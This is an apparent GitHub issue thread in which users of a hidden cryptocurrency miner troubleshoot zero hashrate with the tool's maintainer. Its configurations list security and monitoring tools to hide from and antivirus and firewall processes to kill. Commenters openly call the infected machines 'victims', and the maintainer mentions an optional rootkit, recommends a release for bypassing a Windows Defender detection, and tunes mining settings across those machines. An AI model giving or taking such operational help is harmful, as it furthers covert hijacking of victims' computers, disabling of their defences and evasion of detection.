### ISSUE TITLE
No hash rate

### ISSUE THREAD

**Issue by DerXanRam** [UnamSanctam/SilentCryptoMiner#822]
I started the miner with the following configuration before 1 hour ago. but on my web panel and moneroocean dashboard there is no hash rate. Also no stealth programs are running.Please help. web panel screenshot also attached.

`{
    "algo": "rx/0",
    "pool": "gulf.moneroocean.stream",
    "port": 20128,
    "wallet": "my address",
    "password": "",
    "nicehash": true,
    "ssltls": true,
    "max-cpu": 40,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,AnVir.exe,PLlhDBWxRt.exe,GPU-Z.exe,regedit.exe,Autoruns.exe,adwcleaner.exe,CCleaner64.exe,bitdefender.exe,kaspersky.exe,panda.exe,zoneAlarm.exe,Malwarebytes.exe,defender.exe,eset.exe,360.exe,IObit.exe,ffxiv.exe,ffxiv_dx11.exe,MSIAfterburner.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,browser.exe,Honeygain.exe,AvastBrowser.exe,iproyal_pawns.exe,360.exe"
}`

![Screenshot (2)](https://user-images.githubusercontent.com/101794261/172053507-13f1515c-8289-429d-9c5b-d7a9aae72c55.png)

**Comment by UnamSanctam** [comment]
Do you get any hashrate with the normal xmrig? Extract this [normal xmrig.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/8840078/normal.xmrig.zip) somewhere and replace `WALLET` inside `start - moneroocean.bat` with your wallet address and then run `start - moneroocean.bat`.

**Comment by DerXanRam** [comment]
> Do you get any hashrate with the normal xmrig? Extract this [normal xmrig.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/8840078/normal.xmrig.zip) somewhere and replace `WALLET` inside `start - moneroocean.bat` with your wallet address and then run `start - moneroocean.bat`.

wait ...let me try

**Comment by DerXanRam** [comment]
> Do you get any hashrate with the normal xmrig? Extract this [normal xmrig.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/8840078/normal.xmrig.zip) somewhere and replace `WALLET` inside `start - moneroocean.bat` with your wallet address and then run `start - moneroocean.bat`.

I tried it and no hash rate and no worker listed. See the screenshot of xmrrgig miner. I turn on rootkit, is that the problem?
![Screenshot (3)](https://user-images.githubusercontent.com/101794261/172054691-4d611eca-3d9c-4007-90db-9b216e31c079.png)

**Comment by DerXanRam** [comment]
> > Do you get any hashrate with the normal xmrig? Extract this [normal xmrig.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/8840078/normal.xmrig.zip) somewhere and replace `WALLET` inside `start - moneroocean.bat` with your wallet address and then run `start - moneroocean.bat`.
> 
> wait ...let me try

wait wait.... now the worker(xmrrig, the bat file) appears on moneroocean.

**Comment by UnamSanctam** [comment]
Looks like the original xmrig didn't work at first for you either (first screenshot), I would guess it might be because of your computer specs, especially since you only have 4GB of RAM. But the rootkit (r77-rootkit) is an experimental feature as well so it's unknown of all the effects it can have on your computer. How many times did you restart the normal xmrig for it to work?

**Comment by DerXanRam** [comment]
> Looks like the original xmrig didn't work at first for you either (first screenshot), I would guess it might be because of your computer specs, especially since you only have 4GB of RAM. But the rootkit (r77-rootkit) is an experimental feature as well so it's unknown of all the effects it can have on your computer. How many times did you restart the normal xmrig for it to work?
> 
> You can also try adding `worker~ghostrider` (or any other algorithm than GhostRider) into the "Password" field for MoneroOcean to try another algorithm than RandomX, the RandomX algorithm is more resource demanding than many others so using another one to test could be good. I chose GhostRider as an example since it doesn't use much RAM.

     I didn't restart the xmrrig miner ... i just wait like 8 min and it appeares on monerooacean.
      I start using ur miner before 5 month ago and the algorith i used was randomx.it was working without any problem. The problem happens today when i use latest miner.
      Any way i will try another algorithm and i will fool around with the rootkit setting, then i will return with detail report or result.

Thanks for your patients 🙏

**Comment by DerXanRam** [comment]
> Looks like the original xmrig didn't work at first for you either (first screenshot), I would guess it might be because of your computer specs, especially since you only have 4GB of RAM. But the rootkit (r77-rootkit) is an experimental feature as well so it's unknown of all the effects it can have on your computer. How many times did you restart the normal xmrig for it to work?
> 
> You can also try adding `worker~ghostrider` (or any other algorithm than GhostRider) into the "Password" field for MoneroOcean to try another algorithm than RandomX, the RandomX algorithm is more resource demanding than many others so using another one to test could be good. I chose GhostRider as an example since it doesn't use much RAM.

=>I changed my algorithm from randomx to ghost rider but still my hash is 0. 
=>I disabled rootkit option and build another miner. Then, first i uninstalled the previous version using the "uninstaller" and install the new one. Still the same. my hash is 0.
=>i build another miner with another pools and something funny happened. when i change my pools to "minexmr.com" or "xmrpool.eu", the miner status on the web panel syas "Error". (see screenshot 1)
=>when again, i build the miner and run with "moneroocean.stream", its status is "active" but still no hash rate.(see screenshot 2)
![Screenshot 1](https://user-images.githubusercontent.com/101794261/172070404-fad839bd-1eae-4afe-bd9d-b5c7187b096d.png)
![Screenshot 2](https://user-images.githubusercontent.com/101794261/172070407-b2ab4ff8-cb19-44ca-9aac-591e9b92a3e6.png)

**Comment by UnamSanctam** [comment]
It says error if it can't connect, for MineXMR and such you need to enter a password, try with these settings https://github.com/UnamSanctam/SilentCryptoMiner/wiki#lite but only change the wallet address and the "API Endpoint URL" and nothing more and see what happens.

**Comment by DerXanRam** [comment]
> It says error if it can't connect, for MineXMR and such you need to enter a password, try with these settings https://github.com/UnamSanctam/SilentCryptoMiner/wiki#lite but only change the wallet address and the "API Endpoint URL" and nothing more and see what happens.

what  did u mean change "API Endpoint URL"? i haven't another host.

**Comment by UnamSanctam** [comment]
I mean use the example settings but only change the wallet address to your own and then change the "API Endpoint URL" to your web panel.

**Comment by DerXanRam** [comment]
> I mean use the example settings but only change the wallet address to your own and then change the "API Endpoint URL" to your web panel.

ok wait...let me try

**Comment by DerXanRam** [comment]
> I mean use the example settings but only change the wallet address to your own and then change the "API Endpoint URL" to your web panel.

i use your configurations with pool.minexmr.com:4444 and still status is "Error".

**Comment by UnamSanctam** [comment]
Yes only change the wallet address and the web panel URL, don't change anything else. And you need to add a password (worker name) to mine to MineXMR.

**Comment by DerXanRam** [comment]
> 

i changed the pool cause "xmr.2miners.com:12222" is blocked in my country. can u send configuration for "minexmr.com" or "xmrpool.eu" please?

**Comment by UnamSanctam** [comment]
Change pool to pool.minexmr.com:443 (since the example is using SSL) and just write `worker` in the "Password".

**Comment by DerXanRam** [comment]
does input the word "worker" in the filed of password and other settings work for these pools? 
"supportxmr.com" 
"xmrpool.eu" 
"nanopool.org"

if not, can u tell me the configuration of them. i asked u cause the previous configuration with "worker" in the field of password is connected to the pool. But still hash is 0. i will wait it until tomorrow and if it doesn't work i will try the above pools.   

Thanks for your patients.

**Comment by UnamSanctam** [comment]
SupportXMR requires a worker name in the password field like MineXMR, xmrpool and Nanopool doesn't require a password. Also, do you have another computer to test on? Since that ones specs are quite bad which could cause it not to mine, you can also disable "Stealth" and check in the Task Manager if it's using any CPU (probably it isn't).

**Comment by DerXanRam** [comment]
> SupportXMR requires a worker name in the password field like MineXMR, xmrpool and Nanopool doesn't require a password. Also, do you have another computer to test on? Since that ones specs are quite bad which could cause it not to mine, you can also disable "Stealth" and check in the Task Manager if it's using any CPU (probably it isn't).

But the miner was working 2.5k h/s before today. yaa i have another  i7 8th gen, 3.20 Ghz spec desktop for testing purpose. Does is it enough to test CPU mining.

**Comment by UnamSanctam** [comment]
Yes, the biggest problem would probably be the small RAM (your current one has 4GB).

**Comment by DerXanRam** [comment]
> Yes, the biggest problem would probably be the small RAM (your current one has 4GB).

OK i will report the result tomorrow including testing with 8 GB RAM. For today let give the pool and the miner some time. But underline that the previous miner was worked 2.5 kh/s with these spes without any problem. (4 GB RAM, Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz). Please check this version code.

Thanks for your time.
see u tomorrow.

**Comment by DuyLvzy123** [comment]
> Yes, the biggest problem would probably be the small RAM (your current one has 4GB).

![Uploading Screenshot_2022-06-06-07-51-02-92.png…]()

**Comment by DuyLvzy123** [comment]
> Yes, the biggest problem would probably be the small RAM (your current one has 4GB).

![Screenshot_2022-06-06-07-51-02-92](https://user-images.githubusercontent.com/99333895/172078951-bcbdccd6-7e00-4310-8304-7705885e864b.png)

**Comment by UnamSanctam** [comment]
> > Yes, the biggest problem would probably be the small RAM (your current one has 4GB).
> 
> OK i will report the result tomorrow including testing with 8 GB RAM. For today let give the pool and the miner some time. But underline that the previous miner was worked 2.5 kh/s with these spes without any problem. (4 GB RAM, Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz). Please check this version code.
> 
> Thanks for your time. see u tomorrow.

Someone has reported via email that they might have problems (with normal RandomX) on one of their computers (out of 40) due to the Panthera (it's a variation of RandomX so it changes RandomX code) algorithm and from what he has sent it seems logical why it would be. I sent him a version without Panthera and it seems to work for him so I'll be removing Panthera in the next version. Your problem could be due to that, but since it might only happen on some CPU/computers it's hard to know (happened only on one of his 40 computers).

**Comment by DuyLvzy123** [comment]
> > > Yes, the biggest problem would probably be the small RAM (your current one has 4GB).
> > 
> > 
> > OK i will report the result tomorrow including testing with 8 GB RAM. For today let give the pool and the miner some time. But underline that the previous miner was worked 2.5 kh/s with these spes without any problem. (4 GB RAM, Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz). Please check this version code.
> > Thanks for your time. see u tomorrow.
> 
> Someone has reported via email that they might have problems (with normal RandomX) on one of their computers (out of 40) due to the Panthera (it's a variation of RandomX so it changes RandomX code) algorithm and from what he has sent it seems logical why it would be. I sent him a version without Panthera and it seems to work for him so I'll be removing Panthera in the next version. Your problem could be due to that, but since it might only happen on some CPU/computers it's hard to know (happened only on one of his 40 computers).

Is this problem caused by the victim's computer?, other victim's computers are fine

**Comment by UnamSanctam** [comment]
According to that person it only happens on one of his 40 computers, and it doesn't happen on any of mine.

**Comment by asxtin** [comment]
> According to that person it only happens on one of his 40 computers, and it doesn't happen on any of mine.

<img width="732" alt="image" src="https://user-images.githubusercontent.com/106918443/172132316-3cc51d00-3fcf-44bc-8ada-2a72d61ae899.png">
Why are some victim's computers showing 0 hashrate?  think it's because their cpu is bad.

**Comment by UnamSanctam** [comment]
Yes it can be due to that, my old computer with an Intel i3 something gets 0H/s with the RandomX algorithm.

**Comment by UnamSanctam** [comment]
> Is this cpu bad? 0 hash rate (Intel(R) Core(TM) i3-1005G1 CPU @ 1.20GHz)

Yes, it's a 2 core CPU so you might have to set Max CPU to at least 50% for it to use at least 1 of the cores.

**Comment by asxtin** [comment]
> > Is this cpu bad? 0 hash rate (Intel(R) Core(TM) i3-1005G1 CPU @ 1.20GHz)
> 
> Yes, it's a 2 core CPU so you might have to set Max CPU to at least 50% for it to use at least 1 of the cores.



> > Is this cpu bad? 0 hash rate (Intel(R) Core(TM) i3-1005G1 CPU @ 1.20GHz)
> 
> Yes, it's a 2 core CPU so you might have to set Max CPU to at least 50% for it to use at least 1 of the cores.

I setting it 40%...

**Comment by asxtin** [comment]
> > Is this cpu bad? 0 hash rate (Intel(R) Core(TM) i3-1005G1 CPU @ 1.20GHz)
> 
> Yes, it's a 2 core CPU so you might have to set Max CPU to at least 50% for it to use at least 1 of the cores.

what about gpu?

**Comment by UnamSanctam** [comment]
> I setting it 40%...

Many 2 core CPUs will still mine with 1 core at 40% but some low-end ones won't since it would most likely lag the system.

> what about gpu?

Doesn't matter there since GPUs work differently.

**Comment by asxtin** [comment]
> 

below 50% cpu are weak computers that can't work?

**Comment by asxtin** [comment]
> > I setting it 40%...
> 
> Many 2 core CPUs will still mine with 1 core at 40% but some low-end ones won't since it would most likely lag the system.
> 
> > what about gpu?
> 
> Doesn't matter there since GPUs work differently.

below 50% cpu are weak computers that can't work?

**Comment by asxtin** [comment]
> > I setting it 40%...
> 
> Many 2 core CPUs will still mine with 1 core at 40% but some low-end ones won't since it would most likely lag the system.
> 
> > what about gpu?
> 
> Doesn't matter there since GPUs work differently.

that's enough, bye bye I'm going to sleep

**Comment by DerXanRam** [comment]
> > > Yes, the biggest problem would probably be the small RAM (your current one has 4GB).
> > 
> > 
> > OK i will report the result tomorrow including testing with 8 GB RAM. For today let give the pool and the miner some time. But underline that the previous miner was worked 2.5 kh/s with these spes without any problem. (4 GB RAM, Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz). Please check this version code.
> > Thanks for your time. see u tomorrow.
> 
> Someone has reported via email that they might have problems (with normal RandomX) on one of their computers (out of 40) due to the Panthera (it's a variation of RandomX so it changes RandomX code) algorithm and from what he has sent it seems logical why it would be. I sent him a version without Panthera and it seems to work for him so I'll be removing Panthera in the next version. Your problem could be due to that, but since it might only happen on some CPU/computers it's hard to know (happened only on one of his 40 computers).

Hay bro....Thanks for informing me ... i am trying the new release....i will update about results with in the next few hours.

Thanks very much unam.

**Comment by DerXanRam** [comment]
> > > Yes, the biggest problem would probably be the small RAM (your current one has 4GB).
> > 
> > 
> > OK i will report the result tomorrow including testing with 8 GB RAM. For today let give the pool and the miner some time. But underline that the previous miner was worked 2.5 kh/s with these spes without any problem. (4 GB RAM, Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz). Please check this version code.
> > Thanks for your time. see u tomorrow.
> 
> Someone has reported via email that they might have problems (with normal RandomX) on one of their computers (out of 40) due to the Panthera (it's a variation of RandomX so it changes RandomX code) algorithm and from what he has sent it seems logical why it would be. I sent him a version without Panthera and it seems to work for him so I'll be removing Panthera in the next version. Your problem could be due to that, but since it might only happen on some CPU/computers it's hard to know (happened only on one of his 40 computers).

I tried the latest release of the miner and wait for 3 hour but still no hase. So i decided to try the old version([v2.3.2)......
![Screenshot (7)](https://user-images.githubusercontent.com/101794261/172238779-56d7f92c-d3f2-4ab7-8da5-7da6e07a8e80.png)

**Comment by UnamSanctam** [comment]
Try going into "Configurations" and then change the "Default xmrig" configuration to this:
```
{
   "algo":"rx/0",
   "pool":"gulf.moneroocean.stream",
   "port":20128,
   "wallet":"WALLETADDRESS",
   "password":"worker~ghostrider",
   "nicehash":false,
   "ssltls":true,
   "max-cpu":40,
   "idle-wait":5,
   "idle-cpu":80,
   "stealth-targets":""
}
```
Don't forget to change the WALLETADDRESS to your own but don't change anything else.

**Comment by DerXanRam** [comment]
> In the web panel try going into "Configurations" and then change the "Default xmrig" configuration to this:
> 
> ```
> {
>    "algo":"rx/0",
>    "pool":"gulf.moneroocean.stream",
>    "port":20128,
>    "wallet":"WALLETADDRESS",
>    "password":"worker~ghostrider",
>    "nicehash":false,
>    "ssltls":true,
>    "max-cpu":40,
>    "idle-wait":5,
>    "idle-cpu":80,
>    "stealth-targets":""
> }
> ```
> 
> Don't forget to change the WALLETADDRESS to your own but don't change anything else.

does this requiers computer restart?

**Comment by UnamSanctam** [comment]
No since you're just changing the configuration directly from the web panel it will apply the configuration on the miners next connection to the web panel.

**Comment by DerXanRam** [comment]
> In the web panel try going into "Configurations" and then change the "Default xmrig" configuration to this:
> 
> ```
> {
>    "algo":"rx/0",
>    "pool":"gulf.moneroocean.stream",
>    "port":20128,
>    "wallet":"WALLETADDRESS",
>    "password":"worker~ghostrider",
>    "nicehash":false,
>    "ssltls":true,
>    "max-cpu":40,
>    "idle-wait":5,
>    "idle-cpu":80,
>    "stealth-targets":""
> }
> ```
> 
> Don't forget to change the WALLETADDRESS to your own but don't change anything else.

Wow......it worked.....with in a minute it worked....Thanks man...so the problem is from the web panel.

**Comment by DerXanRam** [comment]
> No, what I changed in the configuration is that I changed the algorithm to GhostRider and I removed the "stealth-targets", so it's either due to the algorithm or removing the "stealth-targets" that caused it to work.
> 
> Most likely it's working because you're mining the GhostRider algorithm now which requires less resources to mine (especially RAM).

i don't think so...cause yesterday, i changed the algorithm to gohst rider in the builder setting and it was 0 hash. Also i tried by using only default stealth targets and it was not working. and i try the miner with 8 GB RAM and it was not working.

**Comment by UnamSanctam** [comment]
Then most likely you input the settings wrong when you changed it, try building a new MoneroOcean miner but change the password to `worker~ghostrider` (also don't enable "NiceHash"). Don't forget to remove the configuration in the web panels "Default xmrig" configuration to `{}`

**Comment by DerXanRam** [comment]
> No, what I changed in the configuration is that I first changed the algorithm to GhostRider and also removed the "stealth-targets", so it's either due to the algorithm change or removing the "stealth-targets" that caused it to work.
> 
> Most likely it's working because you're mining the GhostRider algorithm now which requires less resources to mine (especially RAM).

and now i am recognizing , when i use ghost rider the hash rate decreased by almost 35 to 40 % from the previous one (the miner which used randomx).

**Comment by DerXanRam** [comment]
> Then most likely you input the settings wrong when you changed it, try building a new MoneroOcean miner but change the password to `worker~ghostrider` (also don't enable "NiceHash"). Don't forget to remove the configuration in the web panels "Default xmrig" configuration to `{}`

ok i will try it...... and i will report the results tommorow....cause now it is mid night in my country.

Thanks very much man.....u are very good person....thanks again

**Comment by UnamSanctam** [comment]
> and now i am recognizing , when i use ghost rider the hash rate decreased by almost 35 to 40 % from the previous one (the miner which used randomx).

That's because they are different algorithms, and you can't compare hashrates across different algorithms. Currently RTM (GhostRider) has a 270% profit rate per the hash compared to XMR (Monero), so 100 H/s in GhostRider would be equivalent to 270 H/s of RandomX hash.

> ok i will try it...... and i will report the results tommorow....cause now it is mid night in my country.
> 
> Thanks very much man.....u are very good person....thanks again

Sounds good, have a good night.

**Comment by DerXanRam** [comment]
> > and now i am recognizing , when i use ghost rider the hash rate decreased by almost 35 to 40 % from the previous one (the miner which used randomx).
> 
> That's because they are different algorithms, and you can't compare hashrates across different algorithms. Currently RTM (GhostRider) has a 270% profit rate of the hash compared to XMR (Monero), so 100 H/s in GhostRider would be equivalent to 270 H/s of RandomX hash.
> 
> > ok i will try it...... and i will report the results tommorow....cause now it is mid night in my country.
> > Thanks very much man.....u are very good person....thanks again
> 
> Sounds good, have a good night.

oooo.....ok bro...i understand now....have a nice night to u too

**Comment by DerXanRam** [comment]
> > and now i am recognizing , when i use ghost rider the hash rate decreased by almost 35 to 40 % from the previous one (the miner which used randomx).
> 
> That's because they are different algorithms, and you can't compare hashrates across different algorithms. Currently RTM (GhostRider) has a 270% profit rate of the hash compared to XMR (Monero), so 100 H/s in GhostRider would be equivalent to 270 H/s of RandomX hash.
> 
> > ok i will try it...... and i will report the results tommorow....cause now it is mid night in my country.
> > Thanks very much man.....u are very good person....thanks again
> 
> Sounds good, have a good night.

Hay bro for past 2 days, i tasted and already using ghost rider algo by puting "worker~ghostrider" in password field. And it is working nice. Thanks very much.
But to day i saw new hot fix release. Can i must use it? Especially the RunPE detection fix?

Another question is does ghost rider and randomx have equal profit in the same machine within the same given time? Please can u tell me the difference? cause i searched on google and the articles are nit clear.

Thanks very much bro🙏🙏🙏

**Comment by UnamSanctam** [comment]
You don't have to use the new release, but I would recommend it if you can since Windows Defender has released a new detection that it bypasses.

RTM and XMR don't have the same profit, I would say from my tests that nowadays XMR (rx/0) is more profitable on good computers and that RTM (ghostrider) is more profitable on bad computers (used to be the opposite before RTM went down in price). You can set it to mine rx/0 (RandomX) by default from the builder and then create a new "Configuration" with ghostrider, then you can change the configuration of the miners with low hashrate to that new configuration. That way you would have everyone mining rx/0 except the ones you change to ghostrider.

**Comment by DerXanRam** [comment]
> You don't have to use the new release, but I would recommend it if you can since Windows Defender has released a new detection that it bypasses.
> 
> RTM and XMR don't have the same profit, I would say from my tests that nowadays XMR (rx/0) is more profitable on mid range computers and that RTM (ghostrider) is more profitable on high and low end computers (used to be the opposite before RTM went down in price). You can set it to mine rx/0 (RandomX) by default from the builder and then create a new "Configuration" with ghostrider, then you can change the configuration of the miners with low hashrate to that new configuration. That way you would have everyone mining rx/0 except the ones you change to ghostrider.
> 
> Or you can also set everyone to ghostrider, then after a while (maybe an hour or two) change them to rx/0 through the "Configurations", you can then check the "Pay" hashrate on MoneroOcean to see which is more profitable. The "Pay" hashrate shown on MoneroOcean is the hashrate that has been translated into rx/0.

Ok thanks.... can i set algorithm only using web configuration without affecting other miner configuration settings like kill targets, stealth targets, blocked websites? If i can u send an example please?

**Comment by UnamSanctam** [comment]
Yes it will only overwrite what's in the configuration, so if you do:
```
{
   "algo":"rx/0",
   "pool":"gulf.moneroocean.stream",
   "port":20128,
   "wallet":"WALLETADDRESS",
   "password":"worker~ghostrider",
   "ssltls":true
}
```
Then it would only add the configuration and not change any other settings. You can also replace ghostrider there with any other algorithm that MoneroOcean supports (such as rx/0).

**Comment by DerXanRam** [comment]
Ok thanks... u solved my problem......big respect 🙏

> Yes it will only overwrite what's in the configuration, so if you do:
> 
> ```
> {
>    "algo":"rx/0",
>    "pool":"gulf.moneroocean.stream",
>    "port":20128,
>    "wallet":"WALLETADDRESS",
>    "password":"worker~ghostrider",
>    "ssltls":true
> }
> ```
> 
> Then it would only add the configuration and not change any other settings. You can also replace ghostrider there with any other algorithm that MoneroOcean supports (such as rx/0).

U solved my problem ... big respect bro...tnxs

**Comment by DerXanRam** [comment]
Ok thanks... u solved my problem......big respect 🙏

> Yes it will only overwrite what's in the configuration, so if you do:
> 
> ```
> {
>    "algo":"rx/0",
>    "pool":"gulf.moneroocean.stream",
>    "port":20128,
>    "wallet":"WALLETADDRESS",
>    "password":"worker~ghostrider",
>    "ssltls":true
> }
> ```
> 
> Then it would only add the configuration and not change any other settings. You can also replace ghostrider there with any other algorithm that MoneroOcean supports (such as rx/0).

U solved my problem ... big respect bro...tnxs
